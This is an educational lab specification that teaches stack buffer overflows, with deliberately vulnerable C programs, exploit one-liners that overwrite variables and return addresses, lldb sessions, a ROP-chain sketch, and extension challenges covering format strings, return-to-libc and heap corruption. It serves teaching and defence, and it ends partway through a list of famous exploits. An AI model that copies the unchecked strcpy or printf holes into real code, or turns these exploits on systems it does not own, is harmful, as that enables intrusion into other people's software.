Project 5: Exploit Lab (Buffer Overflow Playground)

Sprint: 1 - Memory & Control
Difficulty: Advanced
Time Estimate: 1-2 weeks
Prerequisites: Solid understanding of stack frames, comfort with lldb/gdb


Overview

What you'll build: A set of intentionally vulnerable programs and exploits that demonstrate buffer overflow, return address overwriting, and memory corruption, all in a controlled environment.

Why it teaches memory & control: Nothing makes memory real like watching your input overwrite a return address and redirect execution. This is where "undefined behavior" stops being a compiler warning and becomes observable reality.

The Core Question You're Answering:

"Why do buffer overflows let attackers take over computers?"

This question has defined computer security for 50 years. By building and exploiting vulnerable programs yourself, you'll understand exactly how memory corruption becomes code execution, and why this is such a serious problem.


Safety and Ethics Notice

This project involves exploitation techniques. Use them ONLY:

  • On programs you write yourself
  • On systems you own or have explicit permission to test
  • For educational purposes

Never attempt to exploit software you don't own or systems you don't control. This is illegal and unethical.


Learning Objectives

By the end of this project, you will be able to:

  1. Explain the stack frame layout in detail (locals, saved registers, return address)
  2. Demonstrate buffer overflow by overwriting adjacent variables
  3. Redirect program execution by overwriting return addresses
  4. Use debugging tools (lldb/gdb) to observe memory corruption in real-time
  5. Explain modern mitigations (ASLR, stack canaries, DEP/NX) and why they exist
  6. Craft exploit payloads considering endianness and null bytes
  7. Understand why memory safety matters at a visceral level
  8. Read and interpret AddressSanitizer output for vulnerability detection

Theoretical Foundation

The Stack Frame: Where Vulnerabilities Live

When a function is called, a "stack frame" is created containing:

  1. Local variables - The function's own data
  2. Saved registers - Including the previous frame pointer
  3. Return address - Where to go after this function returns
  4. Arguments - Parameters passed to the function

Stack Frame Layout (x86-64):

High addresses (stack grows DOWN toward low addresses)
┌────────────────────────────────────────────────────────────────┐
│                    Previous Frame                              │
├────────────────────────────────────────────────────────────────┤
│  Function Arguments (if any on stack)                          │
│  arg7, arg8, ... (first 6 args in registers)                   │
├────────────────────────────────────────────────────────────────┤
│  Return Address (8 bytes on x86-64)                            │  ← CRITICAL TARGET
│  Where to jump when function returns                           │
├────────────────────────────────────────────────────────────────┤
│  Saved Frame Pointer (RBP) (8 bytes)                           │
│  Previous function's base pointer                              │
├────────────────────────────────────────────────────────────────┤
│                                                                │
│  Local Variables                                               │
│  - buffers, integers, pointers, etc.                           │
│  - Arrays grow UPWARD toward higher addresses                  │
│                                                                │
├────────────────────────────────────────────────────────────────┤
│  (Stack pointer RSP points here)                               │
└────────────────────────────────────────────────────────────────┘
Low addresses

KEY INSIGHT:
- Stack grows DOWN (toward lower addresses)
- Arrays grow UP (toward higher addresses)
- Buffer overflow writes UP into saved RBP and return address!

The Vulnerability Pattern

void vulnerable() {
    char buffer[64];         // 64 bytes for input
    strcpy(buffer, user_input);  // NO BOUNDS CHECKING!
}

What happens with 80 bytes of input?

BEFORE strcpy():
┌────────────────────────────────────────────────────────────────┐
│  Return Address: 0x00007fff12345678 (legitimate caller)        │
├────────────────────────────────────────────────────────────────┤
│  Saved RBP: 0x00007fff87654321                                 │
├────────────────────────────────────────────────────────────────┤
│                                                                │
│  buffer[64] - empty                                            │
│                                                                │
└────────────────────────────────────────────────────────────────┘

AFTER strcpy() with 80 bytes:
┌────────────────────────────────────────────────────────────────┐
│  Return Address: OVERWRITTEN WITH ATTACKER DATA!               │
├────────────────────────────────────────────────────────────────┤
│  Saved RBP: OVERWRITTEN WITH ATTACKER DATA!                    │
├────────────────────────────────────────────────────────────────┤
│                                                                │
│  buffer[64] - filled with attacker's 64 bytes                  │
│                                                                │
└────────────────────────────────────────────────────────────────┘

When function returns:
1. CPU pops "return address" from stack
2. CPU jumps to that address
3. Attacker controls where execution goes!
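
The before/after picture can be reproduced in a few lines of Python. This is only a model, assuming the simplified layout in the diagrams (a 64-byte buffer directly below the saved RBP and return address); make_frame, unsafe_strcpy, and saved_values are hypothetical helper names, not part of any tool.

```python
import struct
from typing import Tuple

BUF_SIZE = 64  # matches char buffer[64] in the example


def make_frame(saved_rbp: int, return_address: int) -> bytearray:
    """Model the frame from low to high address: buffer, saved RBP, return address."""
    return bytearray(BUF_SIZE) + bytearray(struct.pack("<QQ", saved_rbp, return_address))


def unsafe_strcpy(frame: bytearray, data: bytes) -> None:
    """Copy like strcpy: stop at the first NUL in the source, append a NUL, never check size."""
    end = data.find(b"\x00")
    src = (data if end == -1 else data[:end]) + b"\x00"
    frame[0:len(src)] = src  # may run past BUF_SIZE into the saved values


def saved_values(frame: bytearray) -> Tuple[int, int]:
    """Return (saved RBP, return address) as the CPU would read them."""
    return struct.unpack_from("<QQ", frame, BUF_SIZE)


frame = make_frame(0x00007FFF87654321, 0x00007FFF12345678)
unsafe_strcpy(frame, b"A" * 80)
rbp, ret = saved_values(frame)
print(hex(rbp), hex(ret))
```

In this model a 63-byte input leaves both saved values intact, while the 80-byte input replaces each of them with 0x4141414141414141.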

Why This Works: The ret Instruction

The ret (return) instruction does exactly this:

ret  ; equivalent to:
     ;   pop rip  (pop return address into instruction pointer)

If an attacker controls what's at the stack position where the return address was saved, they control rip (the instruction pointer), and thus control execution.
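
As a rough mental model, ret can be written as a function that reads eight bytes at RSP and then moves RSP up by eight. The sketch below assumes a flat byte string standing in for stack memory; the function name and both addresses are made-up examples.

```python
import struct
from typing import Tuple


def ret(stack: bytes, rsp: int) -> Tuple[int, int]:
    """Model `ret`: load 8 bytes at rsp into rip, then advance rsp by 8."""
    (rip,) = struct.unpack_from("<Q", stack, rsp)
    return rip, rsp + 8


# A toy stack where rsp (offset 0 here) points at the saved return address.
legit = struct.pack("<Q", 0x401200)     # hypothetical address inside the caller
hijacked = struct.pack("<Q", 0x401156)  # hypothetical attacker-chosen address

print(hex(ret(legit, 0)[0]))
print(hex(ret(hijacked, 0)[0]))
```

The instruction has no notion of whether the eight bytes are the ones the call originally pushed; whatever is in the slot becomes the next rip.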

The Kill Chain

1. Attacker identifies buffer overflow vulnerability
                    ↓
2. Attacker determines offset to return address
                    ↓
3. Attacker crafts payload:
   [padding to fill buffer] + [address to jump to]
                    ↓
4. Payload is processed by vulnerable function
                    ↓
5. strcpy/gets/etc writes past buffer boundary
                    ↓
6. Return address is overwritten
                    ↓
7. Function returns to attacker-chosen address
                    ↓
8. Attacker code executes (or attacker-chosen function)
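
Step 3 of the chain is mechanical once the offset and target are known. A minimal sketch, assuming an x86-64 target (8-byte little-endian addresses); build_payload is a hypothetical helper, and the values 72 and 0x401156 are the ones this document uses for Level 2.

```python
import struct


def build_payload(offset: int, target: int, filler: bytes = b"A") -> bytes:
    """Pad up to the return address, then append the target address."""
    if offset < 0 or len(filler) != 1:
        raise ValueError("offset must be non-negative and filler a single byte")
    return filler * offset + struct.pack("<Q", target)  # "<Q" = 8-byte little-endian


payload = build_payload(72, 0x401156)
print(len(payload), payload[-8:].hex())
```

Keeping the offset and address as parameters makes it easy to rebuild the payload when a recompile moves either one.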

Modern Mitigations

These protections exist because of buffer overflow attacks:

1. Stack Canaries (Stack Protector)

Stack with canary:
┌────────────────────────────────────────────────────────────────┐
│  Return Address                                                │
├────────────────────────────────────────────────────────────────┤
│  Saved RBP                                                     │
├────────────────────────────────────────────────────────────────┤
│  CANARY VALUE (random, checked before return)                  │  ← If changed, abort!
├────────────────────────────────────────────────────────────────┤
│  buffer[64]                                                    │
└────────────────────────────────────────────────────────────────┘

To overwrite return address, attacker MUST overwrite canary first.
Canary is checked before return - if wrong value, program aborts.
Compiler inserts canary automatically with -fstack-protector.
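
The check itself is simple enough to simulate. The sketch below is a toy model, not how the compiler implements it: it assumes the layout in the diagram (buffer, canary, saved RBP, return address), and call_with_canary and StackSmashDetected are hypothetical names.

```python
import secrets
import struct

BUF_SIZE = 64


class StackSmashDetected(Exception):
    """Stands in for the abort that happens when the canary check fails."""


def call_with_canary(data: bytes, return_address: int) -> int:
    """Place a canary, copy without bounds checking, verify the canary before returning."""
    canary = secrets.token_bytes(8)
    frame = bytearray(BUF_SIZE) + canary + struct.pack("<QQ", 0, return_address)
    frame[0:len(data)] = data  # unchecked copy, as in the vulnerable example
    if bytes(frame[BUF_SIZE:BUF_SIZE + 8]) != canary:
        raise StackSmashDetected("canary changed, aborting before ret")
    (ret_addr,) = struct.unpack_from("<Q", frame, BUF_SIZE + 16)
    return ret_addr


print(hex(call_with_canary(b"A" * 64, 0x401200)))  # fits the buffer, returns normally
```

An input long enough to reach the return address has to pass through the canary first, so the simulated function raises instead of returning to the overwritten address.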

2. ASLR (Address Space Layout Randomization)

Without ASLR (predictable):
  - libc always at 0x7ffff7000000
  - Stack always at 0x7ffffffde000
  - Easy to predict addresses to jump to

With ASLR (randomized each run):
  - libc at 0x7f3a21000000 this time
  - Stack at 0x7ffc12340000 this time
  - Attacker can't reliably predict addresses

3. DEP/NX (Data Execution Prevention / No-Execute)

Memory regions have permissions:
  - Code section: Execute + Read (no write)
  - Data section: Read + Write (no execute)
  - Stack: Read + Write (no execute)

With NX stack, even if attacker injects code onto stack,
the CPU refuses to execute it: the instruction fetch faults and the
process is killed (typically with SIGSEGV).
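
On Linux you can check these permissions yourself in /proc/<pid>/maps. The following is a small sketch for reading one line of that file; Mapping, parse_maps_line, and is_executable are hypothetical names, and the sample line is illustrative rather than captured from a real process.

```python
from typing import NamedTuple


class Mapping(NamedTuple):
    start: int
    end: int
    perms: str
    name: str


def parse_maps_line(line: str) -> Mapping:
    """Parse one line of /proc/<pid>/maps: 'start-end perms offset dev inode [path]'."""
    fields = line.split(maxsplit=5)
    start, end = (int(x, 16) for x in fields[0].split("-"))
    name = fields[5].strip() if len(fields) > 5 else ""
    return Mapping(start, end, fields[1], name)


def is_executable(m: Mapping) -> bool:
    """True when the mapping carries the x permission bit."""
    return "x" in m.perms


sample = "7ffc12340000-7ffc12361000 rw-p 00000000 00:00 0                          [stack]"
stack = parse_maps_line(sample)
print(stack.name, stack.perms, is_executable(stack))
```

Running the parser over every line of /proc/self/maps for one of your level binaries shows which regions are writable and which are executable; with NX in effect the stack should not be both.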

4. PIE (Position Independent Executable)

Without PIE:
  - Program code always at 0x400000
  - Attacker knows where all functions are

With PIE:
  - Program code at random base each run
  - Attacker can't easily jump to known functions

Project Specification

Level Structure

You'll build progressively harder vulnerable programs:

Level | Challenge                   | Skill Demonstrated
1     | Overwrite adjacent variable | Basic buffer overflow
2     | Overwrite return address    | Stack frame understanding
3     | Call a "win" function       | Address manipulation
4     | Basic shellcode (optional)  | Code injection

Expected Deliverables

  1. Vulnerable programs (level1.c, level2.c, etc.)
  2. Exploit scripts (Python/Bash) for each level
  3. Write-up document explaining each exploit with diagrams
  4. lldb session logs showing exploitation
  5. AddressSanitizer comparison showing how it catches these bugs

Expected Output

Level 1 - Variable Overwrite:

$ ./level1 $(python3 -c "print('A'*64 + '\x78\x56\x34\x12')")
check is at 0x...
buffer is at 0x...
Distance: 64 bytes
check = 0x12345678
You win!

Level 2 - Return Address Overwrite:

$ ./level2 $(python3 -c "import sys; sys.stdout.buffer.write(b'A'*72 + b'\x56\x11\x40\x00\x00\x00\x00\x00')")
win() is at 0x401156
buffer at 0x...
You shouldn't be able to call this function!
Congratulations, you've exploited a buffer overflow!

lldb Session:

(lldb) memory read -fx -c20 $rbp-64
0x7fff5fbff870: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fff5fbff880: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fff5fbff890: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fff5fbff8a0: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fff5fbff8b0: 0x41414141 0x41414141 0x00401156 0x00000000
                                      ↑ Return address overwritten!

Solution Architecture

Level 1: Variable Overwrite

Concept: Buffer adjacent to important variable, overflow corrupts it.

// level1.c
#include <stdio.h>
#include <string.h>

int main(int argc, char** argv) {
    int check = 0;           // Target variable
    char buffer[64];         // Vulnerable buffer

    if (argc < 2) {
        printf("Usage: %s <input>\n", argv[0]);
        return 1;
    }

    printf("check is at %p\n", (void*)&check);
    printf("buffer is at %p\n", (void*)buffer);
    printf("Distance: %td bytes\n", (char*)&check - buffer);

    strcpy(buffer, argv[1]);  // VULNERABILITY

    printf("check = 0x%08x\n", check);

    if (check == 0x12345678) {
        printf("You win!\n");
    } else {
        printf("Try again. check should be 0x12345678\n");
    }

    return 0;
}

Memory layout:

Stack (high to low):
┌──────────────────────────────────────┐
│ Return address                       │
├──────────────────────────────────────┤
│ Saved RBP                            │
├──────────────────────────────────────┤
│ int check (4 bytes) = 0              │ ← TARGET (offset ~64)
├──────────────────────────────────────┤
│ char buffer[64]                      │ ← WRITE HERE
│                                      │
│ (buffer grows UP toward check)       │
└──────────────────────────────────────┘

Exploit:

# 64 bytes fill buffer, next 4 bytes overwrite check
# Note: little-endian byte order for 0x12345678
./level1 $(python3 -c "print('A'*64 + '\x78\x56\x34\x12')")
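
Because the compiler may insert padding, the real distance is not always 64. One way to avoid guessing is to read the "Distance:" line that level1.c prints and build the payload from it. This is a sketch under that assumption; parse_distance and level1_payload are hypothetical helpers, and the sample output uses made-up addresses with a 76-byte gap.

```python
import re
import struct

MAGIC = 0x12345678  # value level1.c compares check against


def parse_distance(program_output: str) -> int:
    """Extract N from the 'Distance: N bytes' line that level1.c prints."""
    match = re.search(r"Distance: (-?\d+) bytes", program_output)
    if match is None:
        raise ValueError("no Distance line found")
    return int(match.group(1))


def level1_payload(distance: int) -> bytes:
    """Pad up to check, then write MAGIC as a 4-byte little-endian int."""
    if distance <= 0:
        raise ValueError("check sits below buffer; this overflow cannot reach it")
    return b"A" * distance + struct.pack("<I", MAGIC)


# Illustrative output only; your addresses and distance will differ.
sample_output = "check is at 0x7ffd0000104c\nbuffer is at 0x7ffd00001000\nDistance: 76 bytes\n"
payload = level1_payload(parse_distance(sample_output))
print(len(payload))
```

A zero or negative distance means the compiler placed check below buffer, in which case no amount of padding helps and the layout itself has to change.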

Level 2: Return Address Overwrite

Concept: Overflow through saved RBP into return address, redirect to win().

// level2.c
#include <stdio.h>
#include <string.h>
#include <stdlib.h>

void win() {
    printf("You shouldn't be able to call this function!\n");
    printf("Congratulations, you've exploited a buffer overflow!\n");
    exit(0);
}

void vulnerable(char* input) {
    char buffer[64];
    printf("buffer at %p\n", buffer);
    strcpy(buffer, input);  // VULNERABILITY
}

int main(int argc, char** argv) {
    if (argc < 2) {
        printf("Usage: %s <input>\n", argv[0]);
        return 1;
    }

    printf("win() is at %p\n", win);
    vulnerable(argv[1]);

    printf("Returned normally. Try harder!\n");
    return 0;
}

Memory layout in vulnerable():

┌──────────────────────────────────────┐
│ Return address (8 bytes)             │ ← TARGET (offset 72)
├──────────────────────────────────────┤
│ Saved RBP (8 bytes)                  │ ← Offset 64-71
├──────────────────────────────────────┤
│ buffer[64]                           │ ← WRITE HERE (offset 0-63)
│                                      │
└──────────────────────────────────────┘

Exploit:

# Find win() address first
nm ./level2 | grep win
# Output: 0000000000401156 T win

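# Craft payload:
# 64 bytes for buffer + 8 bytes for saved RBP + 8 bytes for return address
# level2 reads argv[1], so pass the payload as an argument, not on stdin.
# The shell drops the trailing NUL bytes; strcpy then writes one terminator, and
# the slot's remaining high bytes are already zero in a non-PIE build.
./level2 "$(python3 -c "import sys; sys.stdout.buffer.write(b'A'*72 + b'\x56\x11\x40\x00\x00\x00\x00\x00')")"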
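
The same two steps (look up win(), build the argument) can be scripted. The sketch below assumes nm prints lines of the form "address type name" as in the output above; symbol_address and argv_payload are hypothetical helpers, and the second line of the sample nm output is invented for illustration.

```python
import struct


def symbol_address(nm_output: str, name: str) -> int:
    """Find `name` in nm output lines of the form '<hex address> <type> <symbol>'."""
    for line in nm_output.splitlines():
        parts = line.split()
        if len(parts) == 3 and parts[2] == name:
            return int(parts[0], 16)
    raise KeyError(name)


def argv_payload(offset: int, address: int) -> bytes:
    """Padding plus little-endian address, with trailing NUL bytes dropped.

    argv strings cannot contain NUL, and strcpy appends one terminator itself.
    """
    payload = b"A" * offset + struct.pack("<Q", address).rstrip(b"\x00")
    if b"\x00" in payload:
        raise ValueError("address has an embedded NUL byte; it cannot be passed via argv")
    return payload


nm_output = "0000000000401156 T win\n0000000000401196 T vulnerable\n"
payload = argv_payload(72, symbol_address(nm_output, "win"))
print(len(payload), payload[72:].hex())
```

The resulting bytes could then be handed to the program as a single argument, for example with subprocess.run([b"./level2", payload]) on a POSIX system.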

Level 3: Calling win() with Arguments

Concept: Not just redirect, but set up proper function call with arguments.

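// level3.c
#include <stdio.h>

// unsigned int so the 32-bit magic values compare without sign surprises
void win(unsigned int arg1, unsigned int arg2) {
    if (arg1 == 0xDEADBEEF && arg2 == 0xCAFEBABE) {
        printf("You win with the right arguments!\n");
    } else {
        printf("Called win() but wrong arguments: %x, %x\n", arg1, arg2);
    }
}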

This requires understanding calling conventions:

  • x86-64: first 6 integer args in RDI, RSI, RDX, RCX, R8, R9
  • Need ROP (Return Oriented Programming) techniques to set registers
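
To make the idea concrete, here is what such a chain might look like as bytes. Everything address-related is an assumption: the two gadget addresses are invented placeholders (find real ones in your own binary with a gadget finder such as ROPgadget), and WIN reuses the address from the Level 2 examples.

```python
import struct

# Hypothetical addresses; replace with values from your own binary.
POP_RDI_RET = 0x401233  # assumed address of a "pop rdi; ret" gadget
POP_RSI_RET = 0x401231  # assumed address of a "pop rsi; ret" gadget
WIN = 0x401156          # win() address used elsewhere in this document


def level3_chain(offset: int) -> bytes:
    """Padding, then: pop rdi <- arg1, pop rsi <- arg2, then return into win()."""
    words = [POP_RDI_RET, 0xDEADBEEF, POP_RSI_RET, 0xCAFEBABE, WIN]
    return b"A" * offset + b"".join(struct.pack("<Q", w) for w in words)


chain = level3_chain(72)
print(len(chain))
```

Note that every 8-byte word here contains NUL bytes, so a chain like this cannot pass through argv and strcpy; the vulnerable function would need to read raw bytes, for example from stdin. Real gadgets also often pop an extra register, which needs an extra filler word in the chain.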

Architecture: Finding Offsets

Pattern method:

# Generate unique pattern
python3 -c "print(''.join([chr(65+i//26)+chr(65+i%26) for i in range(100)]))"
# AAABACADAE... each pair is unique

# Run with pattern, examine crash
./level2 "AAABACADAEAFAGAHAIAJA..."

# In debugger, see what value is in return address
# Find that value in pattern to calculate offset

Manual calculation:

buffer[64] = 64 bytes
saved RBP = 8 bytes (x86-64)
return address starts at offset 72

Payload = "A" * 72 + address_in_little_endian
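
The pattern method can be automated. The sketch below regenerates the same two-letter pattern as the one-liner above and looks up the value you read from the return address slot; make_pattern and offset_from_crash are hypothetical helper names.

```python
def make_pattern(pairs: int = 100) -> bytes:
    """Two-letter pattern: AA AB AC ... AZ BA BB ... (unique pairs up to 676)."""
    return "".join(chr(65 + i // 26) + chr(65 + i % 26) for i in range(pairs)).encode("ascii")


def offset_from_crash(pattern: bytes, crashed_value: int) -> int:
    """Locate the 8 bytes that ended up in the return address slot.

    crashed_value is the 64-bit value read from the slot in the debugger;
    memory holds it little-endian, so convert back to byte order first.
    """
    needle = crashed_value.to_bytes(8, "little")
    index = pattern.find(needle)
    if index == -1:
        raise ValueError("value not found in pattern")
    return index


pattern = make_pattern()
# Pretend the debugger showed the 8 pattern bytes that sit at offset 72.
observed = int.from_bytes(pattern[72:80], "little")
print(offset_from_crash(pattern, observed))
```

On x86-64 a pattern value is usually not a valid address, so the fault tends to occur at the ret itself; in that case read the 8 bytes at $rsp rather than expecting the value to appear in rip.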

Implementation Guide

Phase 1: Setup and Level 1 (1-2 hours)

Disable protections for learning:

# Linux/gcc: debug info, no optimizations, no stack protector, no PIE (fixed code addresses)
gcc -g -O0 -fno-stack-protector -no-pie -o level1 level1.c

# On Linux, disable ASLR for debugging
echo 0 | sudo tee /proc/sys/kernel/randomize_va_space

# On macOS, ASLR is harder to disable; use lldb
# Set: settings set target.disable-aslr true

Create level1.c:

  1. Declare int check = 0;
  2. Declare char buffer[64];
  3. Use strcpy(buffer, argv[1]);
  4. Check if check == 0x12345678

Find the offset:

./level1 AAAA
# Note: check is at 0x..., buffer is at 0x...
# Calculate: &check - buffer

Craft exploit:

# Python with binary output for exact bytes (level1 reads argv[1], not stdin)
./level1 "$(python3 -c "import sys; sys.stdout.buffer.write(b'A'*64 + b'\x78\x56\x34\x12')")"

Phase 2: Level 2 - Control Flow Hijack (2-3 hours)

Create level2.c with win() function:

  1. Write win() that prints success message
  2. Write vulnerable() with buffer and strcpy
  3. Main calls vulnerable with user input

Find addresses:

# Find win() address
objdump -d ./level2 | grep win
# or
nm ./level2 | grep win

# Note the address (e.g., 0x401156)

Use lldb to understand layout:

lldb ./level2
(lldb) b vulnerable
(lldb) run AAAAAAAA
(lldb) frame variable
(lldb) register read rbp rsp
(lldb) memory read -fx $rbp-64

Calculate offset:

  • buffer[64] uses 64 bytes
  • Saved RBP uses 8 bytes (x86-64)
  • Return address is at offset 72

Craft and test exploit:

python3 -c "import sys; sys.stdout.buffer.write(b'A'*72 + b'\x56\x11\x40\x00\x00\x00\x00\x00')" > exploit.bin
./level2 $(cat exploit.bin)

Phase 3: Debugging with lldb (2-3 hours)

Full debugging session:

lldb ./level2
(lldb) settings set target.disable-aslr true
(lldb) b vulnerable
(lldb) run $(python3 -c "print('A'*80)")

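# At breakpoint, before strcpy
(lldb) register read rsp rbp rip
# View the stack: 24 words cover $rbp-80 through the return address at $rbp+8
(lldb) memory read -fx -c24 $rbp-80

# Step over lines until strcpy has run (printf comes first, so n twice)
(lldb) n
(lldb) n

# After strcpy: see the corruption
(lldb) memory read -fx -c24 $rbp-80
(lldb) register read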

# Continue to see crash/redirect
(lldb) c

Document what you see:

  1. Stack before overflow
  2. Stack after overflow
  3. Return address value
  4. Where execution goes
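
If you save the memory dumps to a log, a short script can pull the return address out of them for your write-up. This sketch assumes the dump format shown in this document's lldb output (an address, a colon, then 32-bit hex words); parse_memory_dump is a hypothetical helper.

```python
import struct
from typing import Tuple


def parse_memory_dump(text: str) -> Tuple[int, bytes]:
    """Turn 'addr: 0xWORD 0xWORD ...' lines into (start address, raw bytes).

    Each word is treated as a 4-byte little-endian value; lines that do not
    match the format (prompts, annotations) are skipped.
    """
    start = None
    data = bytearray()
    for line in text.splitlines():
        if ":" not in line:
            continue
        addr, words = line.split(":", 1)
        try:
            line_addr = int(addr.strip(), 16)
            values = [int(w, 16) for w in words.split()]
        except ValueError:
            continue
        if start is None:
            start = line_addr
        for v in values:
            data += struct.pack("<I", v)
    if start is None:
        raise ValueError("no dump lines found")
    return start, bytes(data)


dump = "0x7fff5fbff8b0: 0x41414141 0x41414141 0x00401156 0x00000000"
start, raw = parse_memory_dump(dump)
(return_address,) = struct.unpack_from("<Q", raw, 8)
print(hex(start), hex(return_address))
```

Here the dump line starts at the saved RBP, so the return address is the 8 bytes at offset 8; adjust the offset to wherever your own dump begins.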

Phase 4: AddressSanitizer Detection (1 hour)

Compile with AddressSanitizer:

clang -fsanitize=address -g level2.c -o level2_asan

Run and observe detection:

./level2_asan $(python3 -c "print('A'*80)")

# Output shows:
# ==12345==ERROR: AddressSanitizer: stack-buffer-overflow
# WRITE of size 81 at 0x7ffc8b2a1234
#     #0 0x... in strcpy
#     #1 0x... in vulnerable level2.c:15

Compare:

  • Without sanitizer: silent corruption, unexpected behavior
  • With sanitizer: immediate detection with exact location
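
For the comparison deliverable it can help to extract the key fields from the report automatically. A minimal sketch, assuming the report contains the "ERROR: AddressSanitizer: <kind>" and "<READ|WRITE> of size N at <address>" lines shown above; AsanReport and parse_asan are hypothetical names.

```python
import re
from typing import NamedTuple, Optional


class AsanReport(NamedTuple):
    kind: str     # e.g. "stack-buffer-overflow"
    access: str   # "READ" or "WRITE"
    size: int     # bytes touched by the faulting access
    address: int


def parse_asan(text: str) -> Optional[AsanReport]:
    """Pull the error kind and faulting access out of an AddressSanitizer report."""
    kind = re.search(r"ERROR: AddressSanitizer: ([\w-]+)", text)
    access = re.search(r"(READ|WRITE) of size (\d+) at (0x[0-9a-fA-F]+)", text)
    if kind is None or access is None:
        return None
    return AsanReport(kind.group(1), access.group(1), int(access.group(2)), int(access.group(3), 16))


sample = """==12345==ERROR: AddressSanitizer: stack-buffer-overflow
WRITE of size 81 at 0x7ffc8b2a1234
    #0 0x... in strcpy
"""
report = parse_asan(sample)
print(report.kind, report.access, report.size)
```

The size is the whole write, not just the excess: 80 characters plus the NUL terminator give 81 bytes, which is 17 more than the 64-byte buffer holds.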

Phase 5: Write-Up Document (2-3 hours)

Create EXPLOIT_WRITEUP.md with:

  1. Introduction: What are buffer overflows?
  2. Environment: OS, compiler, flags used
  3. Level 1 Walkthrough:
    • Source code analysis
    • Memory layout diagram
    • Offset calculation
    • Exploit payload
    • Screenshot of success
  4. Level 2 Walkthrough:
    • Source code analysis
    • Stack frame diagram
    • lldb session showing corruption
    • Exploit payload with explanation
    • Screenshot of redirected execution
  5. Mitigations: What would prevent these?
  6. Real-World Impact: Famous vulnerabilities

Testing Strategy

Verification Checklist

Level 1:

  • Without exploit: "Try again" message
  • With exploit: "You win!" message
  • check variable value is exactly 0x12345678
  • lldb shows corruption of check variable

Level 2:

  • Without exploit: "Returned normally" message
  • With exploit: win() message appears
  • lldb shows return address overwritten
  • Address in exploit matches win() address

AddressSanitizer:

  • Catches Level 1 overflow
  • Catches Level 2 overflow
  • Shows correct source location
  • Shows size of overflow

Edge Cases to Test

# Exactly fills the buffer: 63 characters + NUL terminator (should be safe)
./level1 $(python3 -c "print('A'*63)")

# One-byte overflow: 64 characters, so the NUL terminator lands past the buffer
./level1 $(python3 -c "print('A'*64)")

# Different padding lengths to find exact offset
./level1 $(python3 -c "print('A'*60 + 'BBBB')")
./level1 $(python3 -c "print('A'*64 + 'BBBB')")
./level1 $(python3 -c "print('A'*68 + 'BBBB')")

Common Pitfalls

Pitfall 1: Endianness Confusion

# WRONG: Big-endian byte order
payload = b'A'*72 + b'\x00\x00\x00\x00\x00\x40\x11\x56'

# CORRECT: Little-endian on x86
payload = b'A'*72 + b'\x56\x11\x40\x00\x00\x00\x00\x00'

# For address 0x0000000000401156:
# Least significant byte first: 56 11 40 00 00 00 00 00

Pitfall 2: Null Bytes in Address

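# Problem: address 0x0000000000401156 contains NUL (0x00) bytes,
# and strcpy stops copying at the first NUL byte in its source.
#
# Why the Level 2 exploit still works: the NUL bytes are the high-order bytes,
# which come last in little-endian order. strcpy copies 56 11 40, then writes
# its own terminator. The remaining high bytes of the saved return address
# were already zero (non-PIE code lives at low addresses), so the slot ends up
# holding 0x401156.
#
# If an address has a NUL byte in the middle, or you need data after the address:
# 1. Read input with gets() or read() from stdin (gets() stops at newline, not NUL)
# 2. Compile with -no-pie (or change the layout) to get a different address range
# 3. Do not rely on argv or environment variables; neither can contain NUL bytes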
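
The effect of strcpy's terminator on the return address slot can be checked with a small model. This sketch assumes an 8-byte slot and models only the part of the copy that lands in it; slot_after_strcpy is a hypothetical helper, and both "original" return addresses are made-up examples.

```python
def slot_after_strcpy(original_slot: bytes, address_bytes: bytes) -> bytes:
    """Return the 8-byte return-address slot after strcpy copies address_bytes over it.

    strcpy stops at the first NUL in the source and then writes one NUL terminator,
    so bytes of the slot beyond that point keep their original values.
    """
    end = address_bytes.find(b"\x00")
    copied = (address_bytes if end == -1 else address_bytes[:end]) + b"\x00"
    slot = bytearray(original_slot)
    slot[0:len(copied)] = copied[:len(slot)]
    return bytes(slot[:8])


win = (0x401156).to_bytes(8, "little")

non_pie = (0x4011C5).to_bytes(8, "little")        # caller address in a non-PIE build
pie = (0x0000555555555189).to_bytes(8, "little")  # caller address in a PIE build

print(hex(int.from_bytes(slot_after_strcpy(non_pie, win), "little")))
print(hex(int.from_bytes(slot_after_strcpy(pie, win), "little")))
```

In the non-PIE case the slot ends up holding exactly 0x401156. In the PIE case the leftover high bytes survive and the result is a mix of old and new bytes, which is one reason the exercises disable PIE.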

Pitfall 3: Stack Alignment

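# The x86-64 System V ABI expects RSP to be 16-byte aligned at each call.
# Entering win() through ret instead of call shifts RSP by 8 bytes, so an
# aligned SSE instruction inside libc (e.g. movaps) may fault with SIGSEGV
# even though the redirect itself worked.

# The padding must stay at 72, or the address misses the return slot:
payload = b'A'*72 + b'\x56\x11\x40\x00\x00\x00\x00\x00'
# If win() crashes inside libc, try skipping its one-byte "push rbp" by
# targeting win+1. Check the instruction boundary with objdump first; if
# win() begins with endbr64, push rbp sits at win+4 instead.
payload = b'A'*72 + b'\x57\x11\x40\x00\x00\x00\x00\x00'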

Pitfall 4: Compiler Optimizations

# WRONG: Compiler may reorder variables, eliminating vulnerability
gcc -O2 level1.c -o level1

# CORRECT: Disable optimizations for learning
gcc -O0 -fno-stack-protector level1.c -o level1

Pitfall 5: Variable Declaration Order

// WRONG: declaration order does not determine stack layout
int check = 0;
char buffer[64];
int other = 0;  // Compiler may place check below buffer, out of the overflow's reach

// BETTER: Use struct to guarantee layout
struct {
    char buffer[64];
    int check;
} data;

Extensions and Challenges

Challenge 1: Format String Vulnerability (Medium)

#include <stdio.h>

void vulnerable(char* input) {
    printf(input);  // VULNERABILITY: user controls format string
}

// Exploit: %x leaks stack values, %n writes to memory
// From the shell: ./vuln "%x.%x.%x.%x"   (leaks stack values)

Challenge 2: Return-to-libc (Hard)

Instead of jumping to win(), call system("/bin/sh"):

  1. Find address of system() in libc
  2. Find address of "/bin/sh" string in libc
  3. Set up call using ROP gadgets

Challenge 3: ROP Chain (Advanced)

Chain multiple "gadgets" (instruction sequences ending in ret) to:

  1. Pop values into registers
  2. Call functions with arguments
  3. Bypass DEP/NX protection

Challenge 4: Heap Overflow (Advanced)

Exploit malloc metadata corruption:

char* a = malloc(64);
char* b = malloc(64);
strcpy(a, user_input);  // Overflow into b's metadata
free(b);  // Exploit corrupted metadata

Challenge 5: Write Mitigated Version (Medium)

Rewrite vulnerable programs with protections:

// Instead of strcpy
strncpy(buffer, input, sizeof(buffer) - 1);
buffer[sizeof(buffer) - 1] = '\0';

// Or better, use strlcpy if available
strlcpy(buffer, input, sizeof(buffer));

Real-World Context

Famous Buffer Overflow Exploits

Morris Worm (1988):

  • First major internet worm
